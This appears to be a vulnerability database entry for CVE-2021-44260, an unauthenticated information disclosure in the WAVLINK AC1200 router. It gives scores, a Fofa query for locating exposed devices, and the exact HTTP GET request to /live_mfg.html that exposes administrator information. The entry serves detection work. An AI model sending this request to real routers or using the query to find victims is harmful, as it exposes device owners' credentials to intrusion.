🔙 목록으로 돌아가기

CVE-2021-44260: WAVLINK AC1200 - Information Disclosure

TitleWAVLINK AC1200 - Information Disclosure
Authorritikchaddha
SeverityHigh
ImpactSuccessful exploitation could lead to sensitive information disclosure.
RemediationApply the latest security patches and updates from the vendor to address this vulnerability.
CVSS Score7.5
EPSS Score0.26366
CVE IDCVE-2021-44260
Fofa Querybody="AC1200" && body="wavlink"
Tags cve cve2022 wavlink exposure ac1200 vuln

🔍 Vulnerability Description

A vulnerability is in the ‘live_mfg.html’ page of the WAVLINK AC1200, version WAVLINK-A42W-1.27.6-20180418, which can allow a remote attacker to access this page without any authentication. When processed, it exposes some key information of the manager of router.

🌐 HTTP Request

GET /live_mfg.html HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/3.6.7
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-44260.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-44260.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A